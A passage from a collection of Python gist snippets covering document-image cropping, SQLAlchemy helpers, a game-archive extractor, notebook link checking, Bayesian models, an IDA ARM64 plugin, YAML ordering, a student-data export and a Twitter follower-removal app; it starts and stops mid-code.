w_proc = int(w * 1. / scale)
image_dis = cv2.resize(image, (w_proc, h_proc))
if debug:
print(image.shape)
print(image_dis.shape)
# make grayscale
gray = cv2.cvtColor(image_dis, cv2.COLOR_BGR2GRAY)
# blur
gray = cv2.GaussianBlur(gray, (5,5), 0)
# get edges of the image
canny = auto_canny(gray)
if debug:
show(canny)
# extract lines from the edge image
# TODO: Seem good for given scale, but need more test images to confirm
threshold = 70
minLineLength = w_proc / 10
maxLineGap = w_proc / 30
lines = cv2.HoughLinesP(canny, 1, numpy.pi/180, threshold, None, minLineLength, maxLineGap)
if debug:
t = cv2.cvtColor(canny, cv2.COLOR_GRAY2BGR)
# classify lines into horizontal or vertical
hori, vert = [], []
for l in lines[0]:
x1, y1, x2, y2 = l
if abs(x1 - x2) > abs(y1 - y2):
hori.append(Line(l))
else:
vert.append(Line(l))
if debug:
cv2.line(t, (x1, y1), (x2, y2), (0, 0, 255), 1)
if debug:
show(t)
# edge cases when not enough lines are detected
# extend the known lines to the edge of the image to create a new line
if len(hori) < 2:
if not hori or hori[0].c_y > h_proc / 2:
hori.append(Line((0, 0, w_proc - 1, 0)))
if not hori or hori[0].c_y <= h_proc / 2:
hori.append(Line((0, h_proc - 1, w_proc - 1, h_proc - 1)))
if len(vert) < 2:
if not vert or vert[0].c_x > w_proc / 2:
vert.append(Line((0, 0, 0, h_proc - 1)))
if not vert or vert[0].c_x <= w_proc / 2:
vert.append(Line((w_proc - 1, 0, w_proc - 1, h_proc - 1)))
# sort lines according to their center point
hori.sort(key=lambda l: l.c_y)
vert.sort(key=lambda l: l.c_x)
# find corners
if debug:
# Visualize corners for debug only
for l in [hori[0], vert[0], hori[-1], vert[-1]]:
x1, y1, x2, y2 = l.point
cv2.line(t, (x1, y1), (x2, y2), (0, 255, 255), 1)
# corners for the small scale
image_points = [intersection(hori[0], vert[0]), intersection(hori[0], vert[-1]),
intersection(hori[-1], vert[0]), intersection(hori[-1], vert[-1])]
if debug:
print("image_points small", image_points)
# scale corners to the original size
for i, p in enumerate(image_points):
x, y = p
image_points[i] = (x * scale, y * scale)
if debug:
cv2.circle(t, (int(x), int(y)), 1, (255, 255, 0), 3)
if debug:
print("image_points large", image_points)
show(t)
# perspective transform
# Proportional to the original image:
# image_points[0] is Upper Left corner
# image_points[1] is Upper Right corner
# image_points[2] is Lower Left corner
# image_points[3] is Lower Right corner
top_width = distance.euclidean(image_points[0], image_points[1])
bottom_width = distance.euclidean(image_points[2], image_points[3])
# Average
output_width = int((top_width + bottom_width) / 2)
left_height = distance.euclidean(image_points[0], image_points[2])
right_height = distance.euclidean(image_points[1], image_points[3])
# Average
output_height = int((left_height + right_height) / 2)
if debug:
print(top_width, bottom_width, output_width)
print(left_height, right_height, output_height)
dst_pts = numpy.array(
((0, 0), (output_width - 1, 0), (0, output_height - 1), (output_width - 1, output_height - 1)),
numpy.float32)
image_points = numpy.array(image_points, numpy.float32)
transmtx = cv2.getPerspectiveTransform(image_points, dst_pts)
return cv2.warpPerspective(image, transmtx, (output_width, output_height))
if __name__ == '__main__':
"""
For testing
test.jpg: expect image in same folder as script, with rectangular object
test-crop.jpg: output cropped image; will overwrite if exists
"""
image = cv2.imread('test.jpg')
# If our test image needs to be rotated
image = numpy.rot90(image, 3)
show(image)
output_image = scanCrop(image, debug=True)
show(output_image)
cv2.imwrite('test-crop.jpg',output_image)
print("Saved.")
```
#### File: hard-gists/c12be33cdcd9a86f20a2/snippet.py
```python
from flask.ext.sqlalchemy import SQLAlchemy
def get_model(self, name):
return self.Model._decl_class_registry.get(name, None)
SQLAlchemy.get_model = get_model
def get_model_by_tablename(self, tablename):
for c in self.Model._decl_class_registry.values():
if hasattr(c, '__tablename__') and c.__tablename__ == tablename:
return c
SQLAlchemy.get_model_by_tablename = get_model_by_tablename
db = SQLAlchemy(app)
```
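A minimal usage sketch for the two monkey-patched lookup helpers above. The `User` model and `users` table name are hypothetical, and `app` is assumed to be an already-configured Flask application.

```python
# Hypothetical usage of the patched helpers (assumes a declarative model named
# User mapped to the "users" table on the db instance created above).
UserModel = db.get_model('User')                 # look up by class name
SameModel = db.get_model_by_tablename('users')   # look up by table name
if UserModel is not None:
    print(UserModel.__tablename__)
```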
#### File: hard-gists/c344f114e1579a29e163/snippet.py
```python
from struct import unpack, iter_unpack
from collections import namedtuple
import os
def read_file_list(f, entry_num):
def decode(data, index):
for (n, item) in enumerate(data):
item = item[0]
item -= 39
item ^= 0xA5
item -= (27 + index + n)
yield item % 256
def to_str(data):
res_string = ''
for item in data:
if item >= 0x21 and item <= 0x7E:
res_string += '{:c}'.format(item)
return res_string
def to_int(data):
result = 0
data = list(data)[::-1]
for item in data:
result <<= 8
result += item
return result
result = []
last_offs, offs = 0, 0
Item = namedtuple('Item', 'name offset size')
for index in range(0, entry_num * 17, 17):
last_offs = offs
raw = list(decode(iter_unpack('B', f.read(17)), index))
name = to_str(raw[:13])
offs = to_int(raw[13:])
if index > 1:
pos = index // 17 - 1
result[pos] = Item(result[pos][0], result[pos][1], offs - last_offs)
result.append(Item(name, offs, 0))
result.pop()
return result
if __name__ == '__main__':
with open('data.fil', 'rb') as f:
num = unpack('i', f.read(4))[0] ^ 0x3BD7A59A
files = read_file_list(f, num)
for file in files:
# if not os.path.exists('export'):
# os.makedirs('export')
with open('{}'.format(file.name), 'wb') as w:
f.seek(file.offset)
w.write(f.read(file.size))
```
#### File: hard-gists/c591cab03c66780b18d5/snippet.py
```python
from __future__ import print_function
# Storage area for missing figures
FIGSTORE = '/home/fperez/talks/slides/fig'
# Module imports
import logging
import os
import shutil
import sys
from bs4 import BeautifulSoup
import requests
from IPython.config.loader import Config
from IPython.config.application import catch_config_error
from IPython.utils.traitlets import Unicode
from IPython.nbconvert.nbconvertapp import NbConvertApp
from IPython.nbconvert.nbconvertapp import nbconvert_aliases, nbconvert_flags
from IPython.nbconvert.writers import WriterBase
# Main code
class LinkCheckWriter(WriterBase):
def copy_image(self, src, dst):
"""Copy src to dst, attempting to hard-link first. """
log = self.log
try:
os.link(src, dst)
except OSError:
try:
shutil.copy(src, dst)
except Exception:
log.error("Image copy failed: %s" % sys.exc_info()[0])
else:
log.warn("Successfully created missing image.")
def verify_images(self, soup):
"""Verify all image references in a BeautifulSoup HTML object.
Parameters
----------
soup : BeautifulSoup object built from an HTML source.
"""
log = self.log
for i, img in enumerate(soup.find_all('img')):
src = img.get('src')
if src.startswith('data:image'):
log.info('Image %s has embedded data.' % i)
return
if os.path.exists(src):
log.info("Image #%s OK: %s" % (i, src))
else:
log.warn("Image #%s missing: %s" % (i, src))
fname = os.path.split(src)[-1]
target_source = os.path.join(FIGSTORE, fname)
if os.path.exists(target_source):
log.warn('Available at: %s' % FIGSTORE)
self.copy_image(target_source, src)
def verify_http_link(self, i, href):
log = self.log
try:
r = requests.get(href)
except requests.ConnectionError:
log.warn("Link #%s Conection Error: %s" % (i, href))
except:
log.error("Link #%s error: %s, %s" % (i, href,
sys.exc_info[0]))
else:
stat = r.status_code
if stat == requests.codes.ok:
log.info("Link #%s OK (%s): %s " % (i, stat, href))
else:
log.warn("Link #%s problem (%s): %s " % (i, stat, href))
def verify_links(self, soup):
"""Verify all links in a BeautifulSoup HTML object.
Parameters
----------
soup : BeautifulSoup object built from an HTML source.
"""
log = self.log
# Nothing implemented on links yet, just log them
for (i, lnk) in enumerate(soup.find_all('a')):
href = lnk.get('href')
if href is None:
log.warn("Malformed link: %s" % lnk)
continue
if href.startswith('http'):
self.verify_http_link(i, href)
elif href.startswith('#'):
log.info("Internal anchor link: %s" % href)
continue
else:
if os.path.exists(href):
log.info("Local valid link: %s" % href)
else:
log.warn("Unkown link: %s" % href)
def write(self, output, resources, **kw):
notebook_uri = resources['unique_key']
self.log.warn('-'*40)
self.log.warn('Checking notebook: %s' % notebook_uri)
soup = BeautifulSoup(output, "html.parser")
self.verify_links(soup)
self.verify_images(soup)
class LinkCheckApp(NbConvertApp):
name = Unicode(u'nblinkcheck')
description = Unicode(u'Check image links in a notebook.')
examples = """
To check all image links in all notebooks in the current directory:
./nblinkcheck *ipynb
"""
def _export_format_default(self):
return 'html'
def build_extra_config(self):
self.extra_config = Config()
self.extra_config.Exporter.preprocessors = [
]
self.config.merge(self.extra_config)
@catch_config_error
def initialize(self, argv=None):
# Meant to be used as a command-line app, so only log at a higher level
self.log.level = logging.WARN
super(LinkCheckApp,self).initialize(argv)
self.build_extra_config()
self.writer = LinkCheckWriter(parent=self)
if __name__ == '__main__':
LinkCheckApp.launch_instance()
```
#### File: hard-gists/c5af642cf217971d93f499e8f70fcb72/snippet.py
```python
import theano
import theano.tensor as T
from theano.tensor.shared_randomstreams import RandomStreams
from theano.sandbox.rng_mrg import MRG_RandomStreams
from lasagne.updates import adam
from lasagne.utils import collect_shared_vars
from sklearn.datasets import fetch_mldata
from sklearn.cross_validation import train_test_split
from sklearn import preprocessing
import numpy as np
rnd = RandomStreams(seed=123)
gpu_rnd = MRG_RandomStreams(seed=123)
def nonlinearity(x):
return T.nnet.relu(x)
def log_gaussian(x, mu, sigma):
return -0.5 * np.log(2 * np.pi) - T.log(T.abs_(sigma)) - (x - mu) ** 2 / (2 * sigma ** 2)
def log_gaussian_logsigma(x, mu, logsigma):
return -0.5 * np.log(2 * np.pi) - logsigma / 2. - (x - mu) ** 2 / (2. * T.exp(logsigma))
def _shared_dataset(data_xy, borrow=True):
data_x, data_y = data_xy
shared_x = theano.shared(np.asarray(data_x, dtype=theano.config.floatX), borrow=borrow)
shared_y = theano.shared(np.asarray(data_y, dtype=theano.config.floatX), borrow=borrow)
return shared_x, shared_y
def init(shape):
return np.asarray(
np.random.normal(0, 0.05, size=shape),
dtype=theano.config.floatX
)
def get_random(shape, avg, std):
return gpu_rnd.normal(shape, avg=avg, std=std)
if __name__ == '__main__':
mnist = fetch_mldata('MNIST original')
# prepare data
N = 5000
data = np.float32(mnist.data[:]) / 255.
idx = np.random.choice(data.shape[0], N)
data = data[idx]
target = np.int32(mnist.target[idx]).reshape(N, 1)
train_idx, test_idx = train_test_split(np.array(range(N)), test_size=0.05)
train_data, test_data = data[train_idx], data[test_idx]
train_target, test_target = target[train_idx], target[test_idx]
train_target = np.float32(preprocessing.OneHotEncoder(sparse=False).fit_transform(train_target))
# inputs
x = T.matrix('x')
y = T.matrix('y')
n_input = train_data.shape[1]
M = train_data.shape[0]
sigma_prior = T.exp(-3)
n_samples = 3
learning_rate = 0.001
n_epochs = 100
# weights
# L1
n_hidden_1 = 200
W1_mu = theano.shared(value=init((n_input, n_hidden_1)))
W1_logsigma = theano.shared(value=init((n_input, n_hidden_1)))
b1_mu = theano.shared(value=init((n_hidden_1,)))
b1_logsigma = theano.shared(value=init((n_hidden_1,)))
# L2
n_hidden_2 = 200
W2_mu = theano.shared(value=init((n_hidden_1, n_hidden_2)))
W2_logsigma = theano.shared(value=init((n_hidden_1, n_hidden_2)))
b2_mu = theano.shared(value=init((n_hidden_2,)))
b2_logsigma = theano.shared(value=init((n_hidden_2,)))
# L3
n_output = 10
W3_mu = theano.shared(value=init((n_hidden_2, n_output)))
W3_logsigma = theano.shared(value=init((n_hidden_2, n_output)))
b3_mu = theano.shared(value=init((n_output,)))
b3_logsigma = theano.shared(value=init((n_output,)))
all_params = [
W1_mu, W1_logsigma, b1_mu, b1_logsigma,
W2_mu, W2_logsigma, b2_mu, b2_logsigma,
W3_mu, W3_logsigma, b3_mu, b3_logsigma
]
all_params = collect_shared_vars(all_params)
# building the objective
# remember, we're evaluating by samples
log_pw, log_qw, log_likelihood = 0., 0., 0.
for _ in xrange(n_samples):
epsilon_w1 = get_random((n_input, n_hidden_1), avg=0., std=sigma_prior)
epsilon_b1 = get_random((n_hidden_1,), avg=0., std=sigma_prior)
W1 = W1_mu + T.log(1. + T.exp(W1_logsigma)) * epsilon_w1
b1 = b1_mu + T.log(1. + T.exp(b1_logsigma)) * epsilon_b1
epsilon_w2 = get_random((n_hidden_1, n_hidden_2), avg=0., std=sigma_prior)
epsilon_b2 = get_random((n_hidden_2,), avg=0., std=sigma_prior)
W2 = W2_mu + T.log(1. + T.exp(W2_logsigma)) * epsilon_w2
b2 = b2_mu + T.log(1. + T.exp(b2_logsigma)) * epsilon_b2
epsilon_w3 = get_random((n_hidden_2, n_output), avg=0., std=sigma_prior)
epsilon_b3 = get_random((n_output,), avg=0., std=sigma_prior)
W3 = W3_mu + T.log(1. + T.exp(W3_logsigma)) * epsilon_w3
b3 = b3_mu + T.log(1. + T.exp(b3_logsigma)) * epsilon_b3
a1 = nonlinearity(T.dot(x, W1) + b1)
a2 = nonlinearity(T.dot(a1, W2) + b2)
h = T.nnet.softmax(nonlinearity(T.dot(a2, W3) + b3))
sample_log_pw, sample_log_qw, sample_log_likelihood = 0., 0., 0.
for W, b, W_mu, W_logsigma, b_mu, b_logsigma in [(W1, b1, W1_mu, W1_logsigma, b1_mu, b1_logsigma),
(W2, b2, W2_mu, W2_logsigma, b2_mu, b2_logsigma),
(W3, b3, W3_mu, W3_logsigma, b3_mu, b3_logsigma)]:
# first weight prior
sample_log_pw += log_gaussian(W, 0., sigma_prior).sum()
sample_log_pw += log_gaussian(b, 0., sigma_prior).sum()
# then approximation
sample_log_qw += log_gaussian_logsigma(W, W_mu, W_logsigma * 2).sum()
sample_log_qw += log_gaussian_logsigma(b, b_mu, b_logsigma * 2).sum()
# then the likelihood
sample_log_likelihood = log_gaussian(y, h, sigma_prior).sum()
log_pw += sample_log_pw
log_qw += sample_log_qw
log_likelihood += sample_log_likelihood
log_qw /= n_samples
log_pw /= n_samples
log_likelihood /= n_samples
batch_size = 100
n_batches = M / float(batch_size)
objective = ((1. / n_batches) * (log_qw - log_pw) - log_likelihood).sum() / float(batch_size)
# updates
updates = adam(objective, all_params, learning_rate=learning_rate)
i = T.iscalar()
train_data = theano.shared(np.asarray(train_data, dtype=theano.config.floatX))
train_target = theano.shared(np.asarray(train_target, dtype=theano.config.floatX))
train_function = theano.function(
inputs=[i],
outputs=objective,
updates=updates,
givens={
x: train_data[i * batch_size: (i + 1) * batch_size],
y: train_target[i * batch_size: (i + 1) * batch_size]
}
)
a1_mu = nonlinearity(T.dot(x, W1_mu) + b1_mu)
a2_mu = nonlinearity(T.dot(a1_mu, W2_mu) + b2_mu)
h_mu = T.nnet.softmax(nonlinearity(T.dot(a2_mu, W3_mu) + b3_mu))
output_function = theano.function([x], T.argmax(h_mu, axis=1))
n_train_batches = int(train_data.get_value().shape[0] / float(batch_size))
# and finally, training loop
for e in xrange(n_epochs):
errs = []
for b in xrange(n_train_batches):
batch_err = train_function(b)
errs.append(batch_err)
out = output_function(test_data)
acc = np.count_nonzero(output_function(test_data) == np.int32(test_target.ravel())) / float(test_data.shape[0])
print 'epoch', e, 'cost', np.mean(errs), 'Accuracy', acc
```
#### File: hard-gists/c6936d219db8e6635d25/snippet.py
```python
import idaapi
import idc
ARM64_MOVE_I = idaapi.ARM_mov
def dump_cmd(cmd):
print "cs = %lx" % cmd.cs
print "ip = %lx" % cmd.ip
print "ea = %lx" % cmd.ea
print "itype = %lx" % cmd.itype
print "size = %lx" % cmd.size
print "auxpref = %lx" % cmd.auxpref
print "segpref = %lx" % cmd.segpref
print "insnpref = %lx" % cmd.insnpref
print "flags = %lx" % cmd.flags
def dump_op(op):
print "n = %lx" % op.n
print "type = %lx" % op.type
print "offb = %lx" % op.offb
print "offo = %lx" % op.offo
print "flags = %lx" % op.flags
print "dtyp = %lx" % op.dtyp
print "reg = %lx" % op.reg
print "phrase = %lx" % op.phrase
print "value = %lx" % op.value
print "addr = %lx" % op.addr
print "specval = %lx" % op.specval
print "specflag1 = %lx" % op.specflag1
print "specflag2 = %lx" % op.specflag2
print "specflag3 = %lx" % op.specflag3
print "specflag4 = %lx" % op.specflag4
def HighestSetBit(N, imm):
i = N - 1
while i >= 0:
if imm & (1 << i):
return i
i -= 1
return -1
def ZeroExtendOnes(M, N): # zero extend M ones to N width
return (1 << M) - 1
def RORZeroExtendOnes(M, N, R):
val = ZeroExtendOnes(M, N)
return ((val >> R) & ((1 << (N - R)) - 1)) | ((val & ((1 << R) - 1)) << (N - R))
def Replicate(val, bits):
ret = val
shift = bits
while shift < 64: # XXX actually, it is either 32 or 64
ret |= (val << shift)
shift += bits
return ret
def DecodeBitMasks(immN, imms, immr, immediate):
len = HighestSetBit(7, (immN << 6) | (~imms & 0x3F))
if len < 1:
return None
levels = ZeroExtendOnes(len, 6)
if immediate and (imms & levels) == levels:
return None
S = imms & levels
R = immr & levels
esize = 1 << len
return Replicate(RORZeroExtendOnes(S + 1, esize, R), esize)
def DecodeMov(opcode, total, first):
# opc
o = (opcode >> 29) & 3
# constant
k = (opcode >> 23) & 0x3F
if k == 0x24 and o == 1: # MOV (bitmask imm) <=> ORR (immediate)
# sf
s = (opcode >> 31) & 1
# N
N = (opcode >> 22) & 1
if s == 0 and N != 0:
return None
# rn
rn = (opcode >> 5) & 0x1F
if rn == 31:
imms = (opcode >> 10) & 0x3F
immr = (opcode >> 16) & 0x3F
return DecodeBitMasks(N, imms, immr, True)
elif k == 0x25: # MOVN/MOVZ/MOVK
# sf
s = (opcode >> 31) & 1
# hw
h = (opcode >> 21) & 3
# imm16
i = (opcode >> 5) & 0xFFFF
if s == 0 and h > 1:
return None
h *= 16
i <<= h
if o == 0: # MOVN
return ~i
elif o == 2: # MOVZ
return i
elif o == 3 and not first: # MOVK
return (total & ~(0xFFFF << h)) | i
elif (k | 1) == 0x23 and not first: # ADD (immediate)
# shift
h = (opcode >> 22) & 3
if h > 1:
return None
# rn
rd = opcode & 0x1F
rn = (opcode >> 5) & 0x1F
if rd != rn:
return None
# imm12
i = (opcode >> 10) & 0xFFF
h *= 12
i <<= h
if o & 2: # SUB
return total - i
else: # ADD
return total + i
return None
def check_mov_sequence(ea):
oldea = ea
reg = -1
total = 0
is64 = False
while idaapi.getseg(ea).use64():
d = idaapi.get_long(ea)
# reg
r = d & 0x1F
if reg >= 0 and reg != r:
break
newval = DecodeMov(d, total, reg < 0)
if newval is None:
break
if reg >= 0 and idaapi.get_first_fcref_to(ea) != idaapi.BADADDR:
break
if (d >> 31) & 1:
is64 = True
total = newval
reg = r
ea += 4
return ea - oldea, reg, is64, total
def is_my_mov(cmd):
if cmd.itype == ARM64_MOVE_I and cmd.flags == idaapi.INSN_MACRO and cmd.size > 4:
return True
return False
def check_ubfm_shift(ea):
if idaapi.getseg(ea).use64():
opcode = idaapi.get_long(ea)
# opc
o = (opcode >> 29) & 3
# constant
k = (opcode >> 23) & 0x3F
if (o & 1) == 0 and k == 0x26:
# sf
s = (opcode >> 31) & 1
# N
N = (opcode >> 22) & 1
if s == N:
# imm
imms = (opcode >> 10) & 0x3F
immr = (opcode >> 16) & 0x3F
mask = 0x1F | ((s & N) << 5)
if imms == mask:
return idaapi.ARM_lsr if o else idaapi.ARM_asr, opcode, s, immr
elif immr == imms + 1:
return idaapi.ARM_lsl if o else idaapi.ARM_null, opcode, s, mask - imms
return idaapi.ARM_null, 0, 0, 0
class simpA64Hook(idaapi.IDP_Hooks):
def __init__(self):
idaapi.IDP_Hooks.__init__(self)
self.n = idaapi.netnode("$ A64 Simplifier",0,1)
def custom_ana(self):
len, reg, is64, imm = check_mov_sequence(idaapi.cmd.ea)
if len > 4:
#print "0x%x: MOV/MOVK %c%d, #0x%x" % (idaapi.cmd.ea, 'X' if is64 else 'W', reg, imm)
#dump_cmd(idaapi.cmd)
#dump_op(idaapi.cmd.Op1)
#dump_op(idaapi.cmd.Op2)
idaapi.cmd.itype = ARM64_MOVE_I
idaapi.cmd.segpref = 14 # ARM Condition = ALways
idaapi.cmd.Op1.type = idaapi.o_reg
idaapi.cmd.Op1.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op1.reg = reg + 129 # Use Wn/Xn registers instead of Rn
idaapi.cmd.Op2.type = idaapi.o_imm
idaapi.cmd.Op2.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op2.value = imm
idaapi.cmd.flags = idaapi.INSN_MACRO
idaapi.cmd.size = len
return True
insn, regs, is64, shift = check_ubfm_shift(idaapi.cmd.ea)
if insn != idaapi.ARM_null:
idaapi.cmd.itype = insn
idaapi.cmd.segpref = 14
idaapi.cmd.Op1.type = idaapi.o_reg
idaapi.cmd.Op1.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op1.reg = (regs & 0x1F) + 129
idaapi.cmd.Op2.type = idaapi.o_reg
idaapi.cmd.Op2.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op2.reg = ((regs >> 5) & 0x1F) + 129
idaapi.cmd.Op3.type = idaapi.o_imm
idaapi.cmd.Op3.dtyp = idaapi.dt_qword if is64 else idaapi.dt_dword
idaapi.cmd.Op3.value = shift
idaapi.cmd.size = 4
return True
return False
def custom_mnem(self): # totally optional
if is_my_mov(idaapi.cmd):
return "MOVE"
return None
# def custom_out(self): # XXX ida would just append .EQ
# if is_my_mov(idaapi.cmd):
# buf = idaapi.init_output_buffer(1024)
# idaapi.OutMnem(16, "")
# idaapi.out_one_operand(0)
# idaapi.out_symbol(',')
# idaapi.OutChar(' ')
# idaapi.out_one_operand(1)
# idaapi.term_output_buffer()
# idaapi.MakeLine(buf)
# return True
# return False
# def custom_outop(self, op): # XXX ida would just use Rn
# if is_my_mov(idaapi.cmd) and op.type == idaapi.o_reg:
# idaapi.out_register("%c%d" % ('X' if op.dtyp == idaapi.dt_qword else 'W', op.reg))
# return True
# return False
class simpa64_t(idaapi.plugin_t):
flags = idaapi.PLUGIN_PROC
comment = "Simplifier"
wanted_hotkey = "Alt-Z"
help = "Runs transparently"
wanted_name = "simpa64"
hook = None
enabled = 1
def init(self):
self.hook = None
if idaapi.ph_get_id() != idaapi.PLFM_ARM or idaapi.BADADDR <= 0xFFFFFFFF:
return idaapi.PLUGIN_SKIP
self.hook = simpA64Hook()
flag = self.hook.n.altval(0)
if flag:
self.enabled = flag - 1
print "%s is %sabled" % (self.wanted_name, "en" if self.enabled else "dis")
if self.enabled:
self.hook.hook()
return idaapi.PLUGIN_KEEP
def run(self, arg):
print "%sabling %s" % ("dis" if self.enabled else "en", self.wanted_name)
if self.enabled:
self.hook.unhook()
else:
self.hook.hook()
self.enabled = self.enabled ^ 1
self.hook.n.altset(0, self.enabled + 1)
idc.Refresh()
def term(self):
if self.hook:
self.hook.unhook()
def PLUGIN_ENTRY():
return simpa64_t()
```
#### File: hard-gists/c70fb69eef42d40bed06/snippet.py
```python
try:
# for python newer than 2.7
from collections import OrderedDict
except ImportError:
# use backport from pypi
from ordereddict import OrderedDict
import yaml
# try to use LibYAML bindings if possible
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from yaml.representer import SafeRepresenter
_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG
def dict_representer(dumper, data):
return dumper.represent_dict(data.iteritems())
def dict_constructor(loader, node):
return OrderedDict(loader.construct_pairs(node))
Dumper.add_representer(OrderedDict, dict_representer)
Loader.add_constructor(_mapping_tag, dict_constructor)
Dumper.add_representer(str,
SafeRepresenter.represent_str)
Dumper.add_representer(unicode,
SafeRepresenter.represent_unicode)
# output = yaml.dump(data, Dumper=Dumper, default_flow_style=False)
# data = yaml.load(stream, Loader=Loader)
# abc:
# x:
# 0: null
# y:
# 1: null
yml_dict = OrderedDict(
abc=OrderedDict(
[('x', OrderedDict([(0, None)])), ('y', OrderedDict([(1, None)]))]))
import json
print(json.dumps(yml_dict, indent=2))
print
# dump ordereddict to yaml
output = yaml.dump(yml_dict, Dumper=Dumper, default_flow_style=False)
print output
# directly write to a file object to save memory.
with open('result.yml', 'w') as f:
yaml.dump(yml_dict, f, default_flow_style=False)
```
#### File: hard-gists/c7a2333c227e24226808/snippet.py
```python
from pylab import *
from scipy.stats import norm, uniform
theta_grid = arange(0,2*pi,1.0/1024.0)
true_b = pi/2
b_belief = ones(shape=theta_grid.shape, dtype=float)
b_belief /= b_belief.sum()
def _radian_normalize(x):
new_x = x.copy()
new_x[where(new_x > 2*pi)] -= 2*pi
new_x[where(new_x < 0)] += 2*pi
return new_x
Nt = 25
t = arange(0,Nt)
true_directions = _radian_normalize(norm(pi/2,pi/4).rvs(Nt-1))
measured_directions = _radian_normalize(true_directions + true_b)
positions = zeros(shape=(2, Nt))
positions[:,1:] = array([ cumsum(cos(true_directions)), cumsum(sin(true_directions)) ])
position_noise = 0.25
measured_positions = positions + norm(0,position_noise).rvs( (2, Nt) )
measured_deltas = measured_positions[:,1:]-measured_positions[:,0:-1]
plot(theta_grid, b_belief, label='prior')
def update_belief(delta_pos, measured_dir, prior):
print "delta_pos = " + str(delta_pos)
print "measured dir = " + str(measured_dir - true_b)
dist = norm(0, 2*position_noise)
posterior = dist.pdf(delta_pos[0] - cos(measured_dir - theta_grid)) * dist.pdf(delta_pos[1] - sin(measured_dir - theta_grid))
posterior *= prior
posterior /= posterior.sum()
return posterior
for i in range(21):
b_belief = update_belief(measured_deltas[:,i], measured_directions[i], b_belief)
if (i % 4 == 0):
plot(theta_grid, b_belief, label='measurement ' + str(i))
legend()
xticks([0, pi/2, pi, 3*pi/2, 2*pi], ['0', 'pi/2', 'pi', '3pi/2', '2pi'])
#axis('equal')
#plot(positions[0], positions[1], 'bo', label='positions')
#plot(measured_positions[0], measured_positions[1], 'go', label='measured positions')
show()
```
#### File: hard-gists/cb2b90523c592abe7ae4/snippet.py
```python
from sqlalchemy import *
from sqlalchemy.sql import select
from ps_db_utils import *
import csv
import os
import shutil
from datetime import *
class StudentData(object):
def __init__(self):
self.fields_for_moodle = [
'id',
'dcid',
'my_custom_field1',
'student_number',
'first_name',
'last_name',
'city',
'schoolid',
'grade_level',
'graduation_year',
'my_custom_field2',
]
self.minimum_grade_level = 2
self.maximum_grade_level = 99
self.db = PsDB()
self.table = self.db.reverse_table("students")
self.table_fields = self.table.c.keys()
self.custom_fields = None
self.custom_fields_table = None
if "u_studentsuserfields" not in self.db.meta.tables.keys():
self.custom_fields_table = Table("u_studentsuserfields", self.db.meta,
Column('studentsdcid', String(50), primary_key=True),
Column('studentsdcid', Integer, ForeignKey("students.dcid"), primary_key=True),
autoload=True)
else:
self.custom_fields_table = self.db.meta.tables["u_studentsuserfields"]
if self.custom_fields_table != None:
self.custom_fields = self.custom_fields_table.c.keys()
def get_field(main_row, custom_row, student_data, field_name):
if field_name in student_data.table_fields:
return main_row.__dict__[field_name]
elif field_name in student_data.custom_fields:
return custom_row.__dict__[field_name]
return None
def valid_student(row, student_data):
enrolled = False
valid_grade = False
# Is the student enrolled, or pre-enrolled with a start date within the next 14 days?
# "0" is active (False boolean value), anything else is inactive.
# "-1" is pre-registered.
if row.enroll_status == 0:
enrolled = True
if row.enroll_status == -1 and row.entrydate:
# Parse entrydate, and make it three days earlier
#entry_date = datetime.strptime(row.entrydate[0:10],"%Y-%m-%d") + timedelta(days=-3)
entry_date = row.entrydate + timedelta(days=-14)
print "Found pre-registered! dcid %s, entry_date %s" % (row.dcid, entry_date, )
if entry_date < datetime.now():
enrolled = True
# Check grade level, if enroll_status is ok!
if row.grade_level >= student_data.minimum_grade_level and row.grade_level <= student_data.maximum_grade_level:
valid_grade = True
else:
valid_grade = False
return enrolled and valid_grade
def ps_fullexport_students():
print "PowerSchool Export of Students data started."
db = PsDB()
student_data = StudentData()
header = []
for field in student_data.fields_for_moodle:
header.append(field)
correct_students_file_name = "ps_students.csv"
print "Writing data to files %s" % correct_students_file_name
correct_students_file = open(correct_students_file_name, 'wb')
correct_students_writer = csv.writer(correct_students_file,dialect='excel')
correct_students_writer.writerow(header)
print "Header written to files."
count = 0
main_student_data = db.get_session().query(student_data.table).all()
custom_student_data = db.get_session().query(student_data.custom_fields_table).all()
for row in main_student_data:
# Full Dump Line
line = []
# Student specific restriction!!! "0" is active (False boolean value), anything else is inactive.
if valid_student(row, student_data):
for cf in custom_student_data:
if row.dcid == cf.studentsdcid:
for field in student_data.fields_for_moodle:
line.append( get_field(row, cf, student_data, field) )
if line:
writer = correct_students_writer
count = count + 1
writer.writerow(line)
if count % 50 == 0:
print "Exported %s records." % count
correct_students_file.close()
print "Finished. Exported %s records in total." % count
if __name__ == "__main__":
ps_fullexport_students()
```
#### File: hard-gists/ce648166902041fbc613/snippet.py
```python
import time
# external
import flask
from twython import Twython
# local
from env import ENV
#INITS
# flask application
app = flask.Flask(__name__)
app.config['URL'] = ENV['URL']
app.config['SECRET_KEY'] = ENV['SECRET_KEY']
# twython object
twitter = Twython(
ENV['API_KEY'],
ENV['API_SECRET'],
)
# FUNCTIONS
def force_unfollow_fans(twitter):
'''
fans == people that follow you that you dont follow back
we block and them unblock them to force an unfollow
'''
user_name = twitter.verify_credentials()['screen_name']
followers = twitter.get_followers_ids()['ids']
following = twitter.get_friends_ids()['ids']
fans = set(followers) - set(following)
for fan in fans:
fan_name = twitter.lookup_user(user_id=fan)[0]['screen_name']
twitter.create_block(user_id=fan)
twitter.destroy_block(user_id=fan)
print('@{} force unfollowed @{}'.format(user_name, fan_name))
time.sleep(10) # to avoid going too far past the rate limit
# ROUTES
@app.route('/')
def index():
return 'go to /login'
@app.route('/login')
def login():
auth = twitter.get_authentication_tokens(callback_url=ENV['URL']+'/callback')
flask.session['oauth_token'] = auth['oauth_token']
flask.session['oauth_token_secret'] = auth['oauth_token_secret']
return flask.redirect(auth['auth_url'])
@app.route('/callback')
def callback():
twitter = Twython(
ENV['API_KEY'],
ENV['API_SECRET'],
flask.session['oauth_token'],
flask.session['oauth_token_secret'],
)
auth_creds = twitter.get_authorized_tokens(flask.request.args['oauth_verifier'])
twitter = Twython(
